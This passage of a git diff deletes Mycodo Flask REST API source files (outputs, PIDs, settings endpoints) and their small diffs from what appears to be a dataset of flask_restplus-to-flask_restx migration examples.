list_data: - return {'output settings': list_data, - 'output states': states}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_output.route('/') -@ns_output.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the output.'} -) -class Outputs(Resource): - """Output status""" - - @accept('application/vnd.mycodo.v1+json') - @ns_output.marshal_with(output_unique_id_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings and status for an output""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - dict_data = get_from_db(OutputSchema, Output, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - control = DaemonControl() - output_state = control.output_state(unique_id) - return {'output settings': dict_data, - 'output device measurements': list_data, - 'output state': output_state}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - @accept('application/vnd.mycodo.v1+json') - @ns_output.expect(output_set_fields) - @flask_login.login_required - def post(self, unique_id): - """Change the state of an output""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - control = DaemonControl() - - state = None - duration = None - duty_cycle = None - - if ns_output.payload: - if 'state' in ns_output.payload: - state = ns_output.payload["state"] - if state is not None: - try: - state = bool(state) - except Exception: - abort(422, message='state must represent a bool value') - - if 'duration' in ns_output.payload: - duration = ns_output.payload["duration"] - if duration is not None: - try: - duration = float(duration) - except Exception: - abort(422, message='duration does not represent a number') - else: - duration = 0 - - if 'duty_cycle' in ns_output.payload: - duty_cycle = ns_output.payload["duty_cycle"] - if duty_cycle is not None: - try: - duty_cycle = float(duty_cycle) - if duty_cycle < 0 or duty_cycle > 100: - abort(422, message='Required: 0 <= duty_cycle <= 100') - except Exception: - abort(422, - message='duty_cycle does not represent float value') - - try: - if state is not None and duration is not None: - return_ = control.output_on_off( - unique_id, state, amount=duration) - elif state is not None: - return_ = control.output_on_off(unique_id, state) - elif duty_cycle is not None: - return_ = control.output_duty_cycle( - unique_id, duty_cycle=duty_cycle) - else: - return {'message': 'Insufficient payload'}, 460 - - return return_handler(return_) - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.target.py deleted file mode 100644 index 02c1a7d..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.target.py +++ /dev/null @@ -1,194 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Output -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.databases.models.output import OutputSchema -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import output_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general -from mycodo.mycodo_flask.utils.utils_output import get_all_output_states - -logger = logging.getLogger(__name__) - -ns_output = api.namespace('outputs', description='Output operations') - -output_states_fields = ns_output.model('Output States Fields', { - 'unique_id': fields.String, - 'state': fields.String -}) - -output_list_fields = api.model('Output Fields List', { - 'output settings': fields.List(fields.Nested(output_fields)), - 'output states': fields.Nested(output_states_fields) -}) - -output_unique_id_fields = ns_output.model('Output Status Fields', { - 'output settings': fields.Nested(output_fields), - 'output device measurements': fields.List( - fields.Nested(device_measurement_fields)), - 'output state': fields.String -}) - -output_set_fields = ns_output.model('Output Modulation Fields', { - 'state': fields.Boolean( - description='Set a non-PWM output state to on (True) or off (False).', - required=False), - 'duration': fields.Float( - description='The duration to keep a non-PWM output on, in seconds.', - required=False, - example=10.0, - exclusiveMin=0), - 'duty_cycle': fields.Float( - description='The duty cycle to set a PWM output, in percent (%).', - required=False, - example=50.0, - min=0) -}) - - -def return_handler(return_): - if return_ is None: - return {'message': 'Success'}, 200 - elif return_[0] in [0, 'success']: - return {'message': 'Success: {}'.format(return_[1])}, 200 - elif return_[0] in [1, 'error']: - return {'message': 'Fail: {}'.format(return_[1])}, 460 - else: - return '', 500 - - -@ns_output.route('/') -@ns_output.doc(security='apikey', responses=default_responses) -class Inputs(Resource): - """Output information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_output.marshal_with(output_list_fields) - @flask_login.login_required - def get(self): - """Show all output settings and statuses""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(OutputSchema, Output) - states = get_all_output_states() - if list_data: - return {'output settings': list_data, - 'output states': states}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_output.route('/') -@ns_output.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the output.'} -) -class Outputs(Resource): - """Output status""" - - @accept('application/vnd.mycodo.v1+json') - @ns_output.marshal_with(output_unique_id_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings and status for an output""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - dict_data = get_from_db(OutputSchema, Output, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - control = DaemonControl() - output_state = control.output_state(unique_id) - return {'output settings': dict_data, - 'output device measurements': list_data, - 'output state': output_state}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - @accept('application/vnd.mycodo.v1+json') - @ns_output.expect(output_set_fields) - @flask_login.login_required - def post(self, unique_id): - """Change the state of an output""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - control = DaemonControl() - - state = None - duration = None - duty_cycle = None - - if ns_output.payload: - if 'state' in ns_output.payload: - state = ns_output.payload["state"] - if state is not None: - try: - state = bool(state) - except Exception: - abort(422, message='state must represent a bool value') - - if 'duration' in ns_output.payload: - duration = ns_output.payload["duration"] - if duration is not None: - try: - duration = float(duration) - except Exception: - abort(422, message='duration does not represent a number') - else: - duration = 0 - - if 'duty_cycle' in ns_output.payload: - duty_cycle = ns_output.payload["duty_cycle"] - if duty_cycle is not None: - try: - duty_cycle = float(duty_cycle) - if duty_cycle < 0 or duty_cycle > 100: - abort(422, message='Required: 0 <= duty_cycle <= 100') - except Exception: - abort(422, - message='duty_cycle does not represent float value') - - try: - if state is not None and duration is not None: - return_ = control.output_on_off( - unique_id, state, amount=duration) - elif state is not None: - return_ = control.output_on_off(unique_id, state) - elif duty_cycle is not None: - return_ = control.output_duty_cycle( - unique_id, duty_cycle=duty_cycle) - else: - return {'message': 'Insufficient payload'}, 460 - - return return_handler(return_) - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.diff deleted file mode 100644 index acac0c2..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/pid.py b/mycodo/mycodo_flask/api/pid.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/pid.py - +++ b/mycodo/mycodo_flask/api/pid.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.databases.models import DeviceMeasurements - from mycodo.databases.models import PID diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.source.py deleted file mode 100644 index 4756005..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.source.py +++ /dev/null @@ -1,90 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import PID -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.databases.models.pid import PIDSchema -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import pid_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_pid = api.namespace('pids', description='PID operations') - -pid_single_fields = api.model('PID Status Fields', { - 'pid settings': fields.Nested(pid_fields), - 'device measurements': fields.List( - fields.Nested(device_measurement_fields)), -}) - -pid_list_fields = api.model('PID Fields List', { - 'pid settings': fields.List(fields.Nested(pid_fields)), -}) - - -@ns_pid.route('/') -@ns_pid.doc(security='apikey', responses=default_responses) -class PIDs(Resource): - """PID information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_pid.marshal_with(pid_list_fields) - @flask_login.login_required - def get(self): - """Show all pid settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(PIDSchema, PID) - if list_data: - return {'pid settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_pid.route('/') -@ns_pid.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the pid'} -) -class SettingsPIDsUniqueID(Resource): - """Interacts with pid settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_pid.marshal_with(pid_single_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a pid""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(PIDSchema, PID, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - return {'pid settings': dict_data, - 'device measurements': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.target.py deleted file mode 100644 index 81c331b..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$pid.py.target.py +++ /dev/null @@ -1,90 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import PID -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.databases.models.pid import PIDSchema -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import pid_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_pid = api.namespace('pids', description='PID operations') - -pid_single_fields = api.model('PID Status Fields', { - 'pid settings': fields.Nested(pid_fields), - 'device measurements': fields.List( - fields.Nested(device_measurement_fields)), -}) - -pid_list_fields = api.model('PID Fields List', { - 'pid settings': fields.List(fields.Nested(pid_fields)), -}) - - -@ns_pid.route('/') -@ns_pid.doc(security='apikey', responses=default_responses) -class PIDs(Resource): - """PID information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_pid.marshal_with(pid_list_fields) - @flask_login.login_required - def get(self): - """Show all pid settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(PIDSchema, PID) - if list_data: - return {'pid settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_pid.route('/') -@ns_pid.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the pid'} -) -class SettingsPIDsUniqueID(Resource): - """Interacts with pid settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_pid.marshal_with(pid_single_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a pid""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(PIDSchema, PID, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - return {'pid settings': dict_data, - 'device measurements': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.diff deleted file mode 100644 index e930c73..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/settings.py b/mycodo/mycodo_flask/api/settings.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/settings.py - +++ b/mycodo/mycodo_flask/api/settings.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.databases.models import DeviceMeasurements - from mycodo.databases.models import Input diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.source.py deleted file mode 100644 index c244229..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.source.py +++ /dev/null @@ -1,557 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Input -from mycodo.databases.models import Math -from mycodo.databases.models import Measurement -from mycodo.databases.models import Output -from mycodo.databases.models import PID -from mycodo.databases.models import Trigger -from mycodo.databases.models import Unit -from mycodo.databases.models import User -from mycodo.databases.models.function import TriggerSchema -from mycodo.databases.models.input import InputSchema -from mycodo.databases.models.math import MathSchema -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.databases.models.measurement import MeasurementSchema -from mycodo.databases.models.measurement import UnitSchema -from mycodo.databases.models.output import OutputSchema -from mycodo.databases.models.pid import PIDSchema -from mycodo.databases.models.user import UserSchema -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import input_fields -from mycodo.mycodo_flask.api.sql_schema_fields import math_fields -from mycodo.mycodo_flask.api.sql_schema_fields import measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import output_fields -from mycodo.mycodo_flask.api.sql_schema_fields import pid_fields -from mycodo.mycodo_flask.api.sql_schema_fields import trigger_fields -from mycodo.mycodo_flask.api.sql_schema_fields import unit_fields -from mycodo.mycodo_flask.api.sql_schema_fields import user_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_settings = api.namespace('settings', description='Settings operations') - -device_measurement_list_fields = ns_settings.model( - 'Device Measurement Settings Fields List', { - 'device measurement settings': fields.List(fields.Nested( - device_measurement_fields)), - } -) - -input_list_fields = ns_settings.model('Input Settings Fields List', { - 'input settings': fields.List(fields.Nested(input_fields)), -}) - -math_list_fields = ns_settings.model('Math Settings Fields List', { - 'math settings': fields.List(fields.Nested(math_fields)), -}) - -measurement_list_fields = ns_settings.model( - 'Measurement Settings Fields List', { - 'measurement settings': fields.List( - fields.Nested(device_measurement_fields)), - } -) - -output_list_fields = ns_settings.model('Output Settings Fields List', { - 'output settings': fields.List(fields.Nested(output_fields)), -}) - -pid_list_fields = ns_settings.model('PID Settings Fields List', { - 'pid settings': fields.List(fields.Nested(pid_fields)), -}) - -trigger_list_fields = ns_settings.model('Trigger Settings Fields List', { - 'trigger settings': fields.List(fields.Nested(trigger_fields)), -}) - -unit_list_fields = ns_settings.model('Unit Settings Fields List', { - 'unit settings': fields.List(fields.Nested(unit_fields)), -}) - -user_list_fields = ns_settings.model('User Settings Fields List', { - 'user settings': fields.List(fields.Nested(user_fields)), -}) - - -@ns_settings.route('/device_measurements') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsDeviceMeasurements(Resource): - """Interacts with device measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(device_measurement_list_fields) - @flask_login.login_required - def get(self): - """Show all device measurement settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db( - DeviceMeasurementsSchema, DeviceMeasurements) - if list_data: - return {'device measurement settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/device_measurements/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the measurement'} -) -class SettingsDeviceMeasurementsUniqueID(Resource): - """Interacts with device measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(device_measurement_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a device measurement with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db( - DeviceMeasurementsSchema, - DeviceMeasurements, - unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/device_measurements/by_device_id/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'device_id': 'The unique ID of the controller (Input, Math, ' - 'etc.) for which the measurement belongs.'} -) -class SettingsDeviceMeasurementsDeviceID(Resource): - """Interacts with device measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(device_measurement_list_fields) - @flask_login.login_required - def get(self, device_id): - """Show the settings for all device measurements with the device_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=device_id).all(), many=True)) - if list_data: - return {'device measurement settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/inputs') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsInputs(Resource): - """Interacts with input settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(input_list_fields) - @flask_login.login_required - def get(self): - """Show all input settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(InputSchema, Input) - if list_data: - return {'input settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/inputs/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the input'} -) -class SettingsInputsUniqueID(Resource): - """Interacts with input settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(input_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an input""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(InputSchema, Input, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/maths') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsMaths(Resource): - """Interacts with math settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(math_list_fields) - @flask_login.login_required - def get(self): - """Show all math settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(MathSchema, Math) - if list_data: - return {'math settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/maths/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the math'} -) -class SettingsMathsUniqueID(Resource): - """Interacts with math settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(math_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an math""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(MathSchema, Math, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/measurements') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsMeasurements(Resource): - """Interacts with measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(measurement_list_fields) - @flask_login.login_required - def get(self): - """Show all measurement settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(MeasurementSchema, Measurement) - if list_data: - return {'measurement settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/measurements/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the measurement'} -) -class SettingsMeasurementsUniqueID(Resource): - """Interacts with measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(measurement_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a measurement with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db( - MeasurementSchema, Measurement, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/outputs') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsOutputs(Resource): - """Interacts with output settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(output_list_fields) - @flask_login.login_required - def get(self): - """Show all output settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(OutputSchema, Output) - if list_data: - return {'output settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/outputs/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the output'} -) -class SettingsOutputsUniqueID(Resource): - """Interacts with output settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(output_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an output with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(OutputSchema, Output, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/pids') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsPIDs(Resource): - """Interacts with PID settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(pid_list_fields) - @flask_login.login_required - def get(self): - """Show all pid settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(PIDSchema, PID) - if list_data: - return {'pid settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/pids/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the pid'} -) -class SettingsPIDsUniqueID(Resource): - """Interacts with PID settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(pid_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a pid with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(PIDSchema, PID, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/triggers') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsTriggers(Resource): - """Interacts with Trigger settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(trigger_list_fields) - @flask_login.login_required - def get(self): - """Show all trigger settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(TriggerSchema, Trigger) - if list_data: - return {'trigger settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/triggers/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the trigger'} -) -class SettingsTriggersUniqueID(Resource): - """Interacts with Trigger settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(trigger_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a trigger with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(TriggerSchema, Trigger, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/units') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsUnits(Resource): - """Interacts with Unit settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(unit_list_fields) - @flask_login.login_required - def get(self): - """Show all unit settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(UnitSchema, Unit) - if list_data: - return {'unit settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/units/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the unit'} -) -class SettingsUnitsUniqueID(Resource): - """Interacts with unit settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(unit_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a unit with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(UnitSchema, Unit, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/users') -@ns_settings.doc(security='apikey', responses=default_responses) -class SettingsUsers(Resource): - """Interacts with User settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(user_list_fields) - @flask_login.login_required - def get(self): - """Show all user settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(UserSchema, User) - if list_data: - return {'user settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_settings.route('/users/') -@ns_settings.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the user'} -) -class SettingsUsersUniqueID(Resource): - """Interacts with user settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_settings.marshal_with(user_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a user with the unique_id""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - - try: - dict_data = get_from_db(UserSchema, User, unique_id=unique_id) - if dict_data: - return dict_data, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.target.py deleted file mode 100644 index 9213228..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$settings.py.target.py +++ /dev/null @@ -1,557 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Input -from mycodo.databases.models import Math -from mycodo.databases.models import Measurement -from mycodo.databases.models import Output -from mycodo.databases.models import PID -from mycodo.databases.models import Trigger -from mycodo.databases.models import Unit -from mycodo.databases.models import User -from mycodo.databases.models.function import TriggerSchema -from mycodo.databases.models.input import InputSchema -from mycodo.databases.models.math import MathSchema -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.databases.models.measurement import MeasurementSchema -from mycodo.databases.models.measurement import UnitSchema -from mycodo.databases.models.output import OutputSchema -from mycodo.databases.models.pid import PIDSchema -from mycodo.databases.models.user import UserSchema -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import input_fields -from 